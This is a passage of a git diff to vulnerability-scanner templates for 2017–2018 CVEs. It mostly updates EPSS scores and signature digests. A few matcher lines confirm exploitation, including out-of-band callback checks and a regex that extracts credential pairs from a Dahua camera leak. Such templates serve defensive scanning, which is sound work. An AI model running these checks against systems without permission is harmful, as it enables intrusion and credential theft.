4a0a0047304502205d471c62efec6be0ffc13ae91b612280031d302034a165b08d732b120e0419d6022100b271aa3d0ac613420bc24b8c53137d046ee98e559ead3fbd2fd3fea0679bb400:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502205d471c62efec6be0ffc13ae91b612280031d302034a165b08d732b120e0419d6022100b271aa3d0ac613420bc24b8c53137d046ee98e559ead3fbd2fd3fea0679bb400:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18558.yaml b/http/cves/2017/CVE-2017-18558.yaml index f4f1db0687..9c4fec47a7 100644 --- a/http/cves/2017/CVE-2017-18558.yaml +++ b/http/cves/2017/CVE-2017-18558.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18558 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.3699 + epss-percentile: 0.37015 cpe: cpe:2.3:a:bestwebsoft:testimonials:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -52,4 +52,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Testimonials by BestWebSoft")' condition: and -# digest: 4a0a004730450220135b51283ffe18237034b1dd9bc8ffda482f0d5311c82486724b1b5d49d8517e02210091fa6944319c03942c11dcaa96136e2a77770a5f621e4a32a5cd49476e56bcf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220135b51283ffe18237034b1dd9bc8ffda482f0d5311c82486724b1b5d49d8517e02210091fa6944319c03942c11dcaa96136e2a77770a5f621e4a32a5cd49476e56bcf6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18562.yaml b/http/cves/2017/CVE-2017-18562.yaml index 8a208aea51..53fd9d2294 100644 --- a/http/cves/2017/CVE-2017-18562.yaml +++ b/http/cves/2017/CVE-2017-18562.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18562 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.3699 + epss-percentile: 0.37015 cpe: cpe:2.3:a:bestwebsoft:error_log_viewer:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -52,4 +52,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Error Log Viewer by BestWebSoft")' condition: and -# digest: 4a0a00473045022012e5024737aa8a7f57994f5b3822bd5bc08d473b444466fbeeee9f5e714a5fbe022100885f3439484e87e71c184caccafb84b810115a68eedbd6355bcb681587274b75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022012e5024737aa8a7f57994f5b3822bd5bc08d473b444466fbeeee9f5e714a5fbe022100885f3439484e87e71c184caccafb84b810115a68eedbd6355bcb681587274b75:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18564.yaml b/http/cves/2017/CVE-2017-18564.yaml index f1ba041c6b..b6423b5be9 100644 --- a/http/cves/2017/CVE-2017-18564.yaml +++ b/http/cves/2017/CVE-2017-18564.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18564 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.3699 + epss-percentile: 0.37015 cpe: cpe:2.3:a:bestwebsoft:sender:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -52,4 +52,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Sender by BestWebSoft")' condition: and -# digest: 4b0a00483046022100cefe7042561e3e7719a5161042e02994b949934b995e28e033f963f8d1eebbd702210083d03168e0f945db616b6ed00411550994d83c38ae067d1897cebb1be83cbfc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100cefe7042561e3e7719a5161042e02994b949934b995e28e033f963f8d1eebbd702210083d03168e0f945db616b6ed00411550994d83c38ae067d1897cebb1be83cbfc7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18565.yaml b/http/cves/2017/CVE-2017-18565.yaml index 700cbff86e..559353355f 100644 --- a/http/cves/2017/CVE-2017-18565.yaml +++ b/http/cves/2017/CVE-2017-18565.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18565 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.3699 + epss-percentile: 0.37015 cpe: cpe:2.3:a:bestwebsoft:updater:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -52,4 +52,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Updater by BestWebSoft")' condition: and -# digest: 4a0a0047304502205201134b77e602887dcecc79e407fe7d11975fad3a94c54c330b9b056eb7f08e022100aba545892f64c4e4e3d669cd444875fe59192eda33643ff38437de4035956a5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502205201134b77e602887dcecc79e407fe7d11975fad3a94c54c330b9b056eb7f08e022100aba545892f64c4e4e3d669cd444875fe59192eda33643ff38437de4035956a5d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18566.yaml b/http/cves/2017/CVE-2017-18566.yaml index 520ea577c6..78ee6909e7 100644 --- a/http/cves/2017/CVE-2017-18566.yaml +++ b/http/cves/2017/CVE-2017-18566.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18566 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.3699 + epss-percentile: 0.37015 cpe: cpe:2.3:a:bestwebsoft:user_role:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -52,4 +52,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "User Role by BestWebSoft")' condition: and -# digest: 4b0a00483046022100bda63c042b34903f729a965932c4ffd66a7db0f8256ec4f2934ce07ee1321544022100f82802644bc75f9c42bf7a9210b588b4f11915bf7139b7b5f6184103c8b8cd1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100bda63c042b34903f729a965932c4ffd66a7db0f8256ec4f2934ce07ee1321544022100f82802644bc75f9c42bf7a9210b588b4f11915bf7139b7b5f6184103c8b8cd1d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index 747037e028..48bb660cd9 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18598 cwe-id: CWE-79 epss-score: 0.00094 - epss-percentile: 0.39442 + epss-percentile: 0.39465 cpe: cpe:2.3:a:designmodo:qards:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -43,4 +43,5 @@ http: part: body words: - "console.log" -# digest: 490a004630440220737f5a4b94739956ccf3a86850dade502190590d33149ffd135e7a4091b61da5022008f2e2495708155ac5f743adf5ca9fd83dd2d09173f44a59ccf725fa1e6965b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220737f5a4b94739956ccf3a86850dade502190590d33149ffd135e7a4091b61da5022008f2e2495708155ac5f743adf5ca9fd83dd2d09173f44a59ccf725fa1e6965b4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18638.yaml b/http/cves/2017/CVE-2017-18638.yaml index 26a39d3787..6514fbd8d5 100644 --- a/http/cves/2017/CVE-2017-18638.yaml +++ b/http/cves/2017/CVE-2017-18638.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-18638 cwe-id: CWE-918 epss-score: 0.00902 - epss-percentile: 0.80974 + epss-percentile: 0.80986 cpe: cpe:2.3:a:graphite_project:graphite:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: part: interactsh_protocol words: - "http" -# digest: 4a0a0047304502205e1580f1bed3c86cf446472e2595bd58d76d51611165818a6cd21cb1c8f3f159022100a7518cf0f9cf4d4093373e84b9e4cabb0bbab59cef19e52917268808ed96f41f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502205e1580f1bed3c86cf446472e2595bd58d76d51611165818a6cd21cb1c8f3f159022100a7518cf0f9cf4d4093373e84b9e4cabb0bbab59cef19e52917268808ed96f41f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml index e361b6692e..20941bd898 100644 --- a/http/cves/2017/CVE-2017-3506.yaml +++ b/http/cves/2017/CVE-2017-3506.yaml @@ -17,7 +17,7 @@ info: cvss-score: 7.4 cve-id: CVE-2017-3506 epss-score: 0.96927 - epss-percentile: 0.99626 + epss-percentile: 0.99628 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -55,4 +55,5 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a004630440220442f7bcb422a42312562834deb1b889b0b82bc1b109cec5cfed781565122a9ab02202e4bdece8f05fc436a046615fbedc714b4c998aa26fda2a3876bdb6e9fbec134:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220442f7bcb422a42312562834deb1b889b0b82bc1b109cec5cfed781565122a9ab02202e4bdece8f05fc436a046615fbedc714b4c998aa26fda2a3876bdb6e9fbec134:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-3528.yaml b/http/cves/2017/CVE-2017-3528.yaml index 8c1de532d2..5bb3b6c1d5 100644 --- a/http/cves/2017/CVE-2017-3528.yaml +++ b/http/cves/2017/CVE-2017-3528.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-3528 cwe-id: CWE-601 epss-score: 0.00865 - epss-percentile: 0.80514 + epss-percentile: 0.80528 cpe: cpe:2.3:a:oracle:applications_framework:12.1.3:*:*:*:*:*:*:* metadata: max-request: 1 @@ -37,4 +37,5 @@ http: part: body words: - 'noresize src="/\interact.sh?configName=' -# digest: 4a0a00473045022100c8ea720c282d45dc10a3ccb84b571a9feb0039fc048109192a6765b113a9a33f02203c0e5135abee80fb805111abf3c8c3655577633d19d550cd69a93ef740571eb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100c8ea720c282d45dc10a3ccb84b571a9feb0039fc048109192a6765b113a9a33f02203c0e5135abee80fb805111abf3c8c3655577633d19d550cd69a93ef740571eb9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-4011.yaml b/http/cves/2017/CVE-2017-4011.yaml index e1e5997ebe..f589d72d84 100644 --- a/http/cves/2017/CVE-2017-4011.yaml +++ b/http/cves/2017/CVE-2017-4011.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-4011 cwe-id: CWE-79 epss-score: 0.00142 - epss-percentile: 0.49833 + epss-percentile: 0.49857 cpe: cpe:2.3:a:mcafee:network_data_loss_prevention:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: part: header words: - "text/html" -# digest: 490a0046304402207a5e647f9112635576986f65e88dbdd3e1ee0c408bd5bec4c417238cfe396232022063117f148faa9079a211ad93437542abcd20b07ea0143b0eccb75672d0d14a2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402207a5e647f9112635576986f65e88dbdd3e1ee0c408bd5bec4c417238cfe396232022063117f148faa9079a211ad93437542abcd20b07ea0143b0eccb75672d0d14a2b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-5487.yaml b/http/cves/2017/CVE-2017-5487.yaml index ee2f619c64..70b0fb3bdb 100644 --- a/http/cves/2017/CVE-2017-5487.yaml +++ b/http/cves/2017/CVE-2017-5487.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-5487 cwe-id: CWE-200 epss-score: 0.97179 - epss-percentile: 0.99743 + epss-percentile: 0.99746 cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-5521.yaml b/http/cves/2017/CVE-2017-5521.yaml index 0a1f6b1141..3157184d35 100644 --- a/http/cves/2017/CVE-2017-5521.yaml +++ b/http/cves/2017/CVE-2017-5521.yaml @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220750edb6f09ed219eaf6bf019dbd96789c3e1943b223e464df7774f270008b121022009dd15b9b14e42a1bff8eba1e1bcdfff2bdfd19df1b267e641a015e5ae87807f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220750edb6f09ed219eaf6bf019dbd96789c3e1943b223e464df7774f270008b121022009dd15b9b14e42a1bff8eba1e1bcdfff2bdfd19df1b267e641a015e5ae87807f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-5631.yaml b/http/cves/2017/CVE-2017-5631.yaml index 18c1817cfb..93fdf68e75 100644 --- a/http/cves/2017/CVE-2017-5631.yaml +++ b/http/cves/2017/CVE-2017-5631.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-5631 cwe-id: CWE-79 epss-score: 0.00286 - epss-percentile: 0.6529 + epss-percentile: 0.6531 cpe: cpe:2.3:a:kmc_information_systems:caseaware:-:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402202301fe9edd8f988dc1d707d747ea7f43397d298aff552c398736a9eddeb3f66d0220098d7c6982ca6f868721d62c1a7793490f31a5e56ed96a48587f4a35bc24507b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402202301fe9edd8f988dc1d707d747ea7f43397d298aff552c398736a9eddeb3f66d0220098d7c6982ca6f868721d62c1a7793490f31a5e56ed96a48587f4a35bc24507b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-5982.yaml b/http/cves/2017/CVE-2017-5982.yaml index 26c39733cb..10e33561d6 100644 --- a/http/cves/2017/CVE-2017-5982.yaml +++ b/http/cves/2017/CVE-2017-5982.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-5982 cwe-id: CWE-22 epss-score: 0.0488 - epss-percentile: 0.91879 + epss-percentile: 0.91883 cpe: cpe:2.3:a:kodi:kodi:17.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205021c67a52670f6d8ae7863f4560ef7a21ef2b5b3fe54fade9a726453303409a022100ca63393759c9ab88a495670611a1d424a4e371e2da5c1c492076fde2892e8871:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502205021c67a52670f6d8ae7863f4560ef7a21ef2b5b3fe54fade9a726453303409a022100ca63393759c9ab88a495670611a1d424a4e371e2da5c1c492076fde2892e8871:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml index 485c37065c..66ea19361c 100644 --- a/http/cves/2017/CVE-2017-6090.yaml +++ b/http/cves/2017/CVE-2017-6090.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-6090 cwe-id: CWE-434 epss-score: 0.9726 - epss-percentile: 0.9979 + epss-percentile: 0.99791 cpe: cpe:2.3:a:phpcollab:phpcollab:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-7269.yaml b/http/cves/2017/CVE-2017-7269.yaml index 2bcaf43cd6..3de2a0b562 100644 --- a/http/cves/2017/CVE-2017-7269.yaml +++ b/http/cves/2017/CVE-2017-7269.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-7269 cwe-id: CWE-119 epss-score: 0.97121 - epss-percentile: 0.99711 + epss-percentile: 0.99714 cpe: cpe:2.3:a:microsoft:internet_information_server:6.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -51,4 +51,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210086f5bffb75bdd7985e71c32edf9dac4279f3ce9b2ee0d87a4f3201276b5d054402200d5a8306ba13c0b6e0ec5a88c3df32a102b4e0421f40a63d74f9e0041c0a45ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502210086f5bffb75bdd7985e71c32edf9dac4279f3ce9b2ee0d87a4f3201276b5d054402200d5a8306ba13c0b6e0ec5a88c3df32a102b4e0421f40a63d74f9e0041c0a45ca:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-7391.yaml b/http/cves/2017/CVE-2017-7391.yaml index 4bf4f29851..7e82c5cf84 100644 --- a/http/cves/2017/CVE-2017-7391.yaml +++ b/http/cves/2017/CVE-2017-7391.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-7391 cwe-id: CWE-79 epss-score: 0.00204 - epss-percentile: 0.58144 + epss-percentile: 0.58163 cpe: cpe:2.3:a:magmi_project:magmi:0.7.22:*:*:*:*:*:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cfa9ba6f412cbbf8e520b5458b05e3b57a625ffad467df2b955b6ff0e99073de022100ddbe2c74d3c94509a2403f0832e97f25988ba29345100d53478828edf977d1ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100cfa9ba6f412cbbf8e520b5458b05e3b57a625ffad467df2b955b6ff0e99073de022100ddbe2c74d3c94509a2403f0832e97f25988ba29345100d53478828edf977d1ac:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-7615.yaml b/http/cves/2017/CVE-2017-7615.yaml index 9fc757ed80..519fe3765c 100644 --- a/http/cves/2017/CVE-2017-7615.yaml +++ b/http/cves/2017/CVE-2017-7615.yaml @@ -53,4 +53,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402206f29d3d4ed64a1770f4bb2bb4c92632fb64a6c13cb17447f491ee5e4be4fc2ce02203188186df51d07cb8e8ab67343d0f99edaa63dd01999954ef2b68676b240223b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402206f29d3d4ed64a1770f4bb2bb4c92632fb64a6c13cb17447f491ee5e4be4fc2ce02203188186df51d07cb8e8ab67343d0f99edaa63dd01999954ef2b68676b240223b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-7921.yaml b/http/cves/2017/CVE-2017-7921.yaml index 9ea71c0274..21406e8367 100644 --- a/http/cves/2017/CVE-2017-7921.yaml +++ b/http/cves/2017/CVE-2017-7921.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-7921 cwe-id: CWE-287 epss-score: 0.01361 - epss-percentile: 0.84777 + epss-percentile: 0.84786 cpe: cpe:2.3:o:hikvision:ds-2cd2032-i_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,5 @@ http: part: header words: - "application/xml" -# digest: 4a0a0047304502206b23dd98af0ed13c7e68f61d232769aa63ac3e836fe405c2d468aa770dac041e022100fb32e124198a5be566787e4c23c57396f61402db16dbafe1a115ac0c838d0f2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502206b23dd98af0ed13c7e68f61d232769aa63ac3e836fe405c2d468aa770dac041e022100fb32e124198a5be566787e4c23c57396f61402db16dbafe1a115ac0c838d0f2f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-7925.yaml b/http/cves/2017/CVE-2017-7925.yaml index c381bb5d7c..9581391649 100644 --- a/http/cves/2017/CVE-2017-7925.yaml +++ b/http/cves/2017/CVE-2017-7925.yaml @@ -16,9 +16,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-7925 - cwe-id: CWE-260,CWE-522 + cwe-id: CWE-522,CWE-260 epss-score: 0.35031 - epss-percentile: 0.96644 + epss-percentile: 0.96647 cpe: cpe:2.3:o:dahuasecurity:dh-ipc-hdbw23a0rn-zs_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: group: 1 regex: - 1:(.*:.*):1:CtrPanel -# digest: 4a0a00473045022100ee91ec8810f3a5106b581c63f8755e033b46bb64eabccf6402656042c8b8b54c022077202a1493d03e4358f9a31f7d12f58ff81c28dbb952848c800af1749b143037:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ee91ec8810f3a5106b581c63f8755e033b46bb64eabccf6402656042c8b8b54c022077202a1493d03e4358f9a31f7d12f58ff81c28dbb952848c800af1749b143037:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-8229.yaml b/http/cves/2017/CVE-2017-8229.yaml index a84301663b..0b9ebfb432 100644 --- a/http/cves/2017/CVE-2017-8229.yaml +++ b/http/cves/2017/CVE-2017-8229.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-8229 cwe-id: CWE-255 epss-score: 0.93519 - epss-percentile: 0.98826 + epss-percentile: 0.98829 cpe: cpe:2.3:o:amcrest:ipm-721s_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -52,4 +52,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402200bc490b0ec028e15f002ef885f81251f2fc4de2516ff5953dc9663031e3f1538022026da4726d1c6766aca081bb0f96d5919d73963b8b25f52ab69be0954ec149736:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402200bc490b0ec028e15f002ef885f81251f2fc4de2516ff5953dc9663031e3f1538022026da4726d1c6766aca081bb0f96d5919d73963b8b25f52ab69be0954ec149736:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-9140.yaml b/http/cves/2017/CVE-2017-9140.yaml index 274627a39b..e7546fdf3e 100644 --- a/http/cves/2017/CVE-2017-9140.yaml +++ b/http/cves/2017/CVE-2017-9140.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-9140 cwe-id: CWE-79 epss-score: 0.0021 - epss-percentile: 0.58796 + epss-percentile: 0.58814 cpe: cpe:2.3:a:progress:telerik_reporting:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402200fc097160ebec0695a303948967fd73ebd39eb086fd9242ae5ec4ac0b9a6f93202204bd7e97f878d5b94cc47ea2900b2c2db5f6f1fdf5cafdbce4e8448928921f8af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402200fc097160ebec0695a303948967fd73ebd39eb086fd9242ae5ec4ac0b9a6f93202204bd7e97f878d5b94cc47ea2900b2c2db5f6f1fdf5cafdbce4e8448928921f8af:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-9288.yaml b/http/cves/2017/CVE-2017-9288.yaml index d28104c279..7ef617e6dc 100644 --- a/http/cves/2017/CVE-2017-9288.yaml +++ b/http/cves/2017/CVE-2017-9288.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-9288 cwe-id: CWE-79 epss-score: 0.00168 - epss-percentile: 0.53679 + epss-percentile: 0.5369 cpe: cpe:2.3:a:raygun:raygun4wp:1.8.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402202bd3c45d5631e6b07c4f6a08f0765fdc563ded40657f50a8922c84db736845b402202ae1f2ceb01bd6706cc8f95b3ac7857e94047cb17b6c056a1a4143822f58586f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402202bd3c45d5631e6b07c4f6a08f0765fdc563ded40657f50a8922c84db736845b402202ae1f2ceb01bd6706cc8f95b3ac7857e94047cb17b6c056a1a4143822f58586f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml index 5e25b288fa..ba343cf827 100644 --- a/http/cves/2017/CVE-2017-9416.yaml +++ b/http/cves/2017/CVE-2017-9416.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-9416 cwe-id: CWE-22 epss-score: 0.01037 - epss-percentile: 0.8229 + epss-percentile: 0.82308 cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:* metadata: verified: true @@ -49,4 +49,5 @@ http: - "contains(body, 'extensions')" - "status_code == 200" condition: and -# digest: 4a0a00473045022100d9dbcad2f5f1fe235b20713320a4fa7cd3877675580b0a1ba9c1c69b93a2bb41022006cc876bc42b34beb4d1b9c2d3b23b7fe3824cefd8b193e216c31477d2333d3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d9dbcad2f5f1fe235b20713320a4fa7cd3877675580b0a1ba9c1c69b93a2bb41022006cc876bc42b34beb4d1b9c2d3b23b7fe3824cefd8b193e216c31477d2333d3b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-9506.yaml b/http/cves/2017/CVE-2017-9506.yaml index a2a852374c..0c07b75105 100644 --- a/http/cves/2017/CVE-2017-9506.yaml +++ b/http/cves/2017/CVE-2017-9506.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-9506 cwe-id: CWE-918 epss-score: 0.00575 - epss-percentile: 0.75535 + epss-percentile: 0.75548 cpe: cpe:2.3:a:atlassian:oauth:1.3.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a00463044022070385e14e27b0040919bc19259648dbf71e7a62c89f074451c61f9287d81e196022040f201067e9b17d47a32ce8cc85f9298eea0e1dec3eae31657f6e3423bbb20ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022070385e14e27b0040919bc19259648dbf71e7a62c89f074451c61f9287d81e196022040f201067e9b17d47a32ce8cc85f9298eea0e1dec3eae31657f6e3423bbb20ab:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-9822.yaml b/http/cves/2017/CVE-2017-9822.yaml index 141057cbcf..dfd6dc5584 100644 --- a/http/cves/2017/CVE-2017-9822.yaml +++ b/http/cves/2017/CVE-2017-9822.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 404 -# digest: 4a0a0047304502203ffc4a1ca152e7e553f7ff23657cfc8e542c112721c98f8629e2e3d8530f4e2b022100c607a1c0e77f255e371e5f317ab4c73f92401ede14dc3affd978e8e6a632d1e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203ffc4a1ca152e7e553f7ff23657cfc8e542c112721c98f8629e2e3d8530f4e2b022100c607a1c0e77f255e371e5f317ab4c73f92401ede14dc3affd978e8e6a632d1e1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-9833.yaml b/http/cves/2017/CVE-2017-9833.yaml index 10fca549df..3100c36956 100644 --- a/http/cves/2017/CVE-2017-9833.yaml +++ b/http/cves/2017/CVE-2017-9833.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-9833 cwe-id: CWE-22 epss-score: 0.35156 - epss-percentile: 0.96649 + epss-percentile: 0.96651 cpe: cpe:2.3:a:boa:boa:0.94.14.21:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022040283aa74407b722d51168438fd8cdf08acd1e86a953f486faf7ca89cf44f9d00221008d817cc1dc2cf5f8f19dfff6227c8e1457770e9a6ea0b9206eff58e6b1b70dcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022040283aa74407b722d51168438fd8cdf08acd1e86a953f486faf7ca89cf44f9d00221008d817cc1dc2cf5f8f19dfff6227c8e1457770e9a6ea0b9206eff58e6b1b70dcc:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-9841.yaml b/http/cves/2017/CVE-2017-9841.yaml index b0b7471242..1a58f2d4ee 100644 --- a/http/cves/2017/CVE-2017-9841.yaml +++ b/http/cves/2017/CVE-2017-9841.yaml @@ -76,4 +76,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201fb868772f37924b2619b2c5096f849aaea9a93e419c5cffe45d157ee0203663022100d8ada169b76859b7bba2323238c35bdaa17bcc1c0c91fa09ede731a17d6869c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502201fb868772f37924b2619b2c5096f849aaea9a93e419c5cffe45d157ee0203663022100d8ada169b76859b7bba2323238c35bdaa17bcc1c0c91fa09ede731a17d6869c0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-0127.yaml b/http/cves/2018/CVE-2018-0127.yaml index db7ad17842..2a77d326d9 100644 --- a/http/cves/2018/CVE-2018-0127.yaml +++ b/http/cves/2018/CVE-2018-0127.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-0127 cwe-id: CWE-306,CWE-200 epss-score: 0.09982 - epss-percentile: 0.94244 + epss-percentile: 0.94252 cpe: cpe:2.3:o:cisco:rv132w_firmware:1.0.0.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220617453a7ef04a37efa93d59ae215776eeaf30c56de20e09e220108f523e9d68e022100ffd3943f29998d00d43ada530ed189651ac3b97bd7e85c04887931176e526883:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220617453a7ef04a37efa93d59ae215776eeaf30c56de20e09e220108f523e9d68e022100ffd3943f29998d00d43ada530ed189651ac3b97bd7e85c04887931176e526883:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-0296.yaml 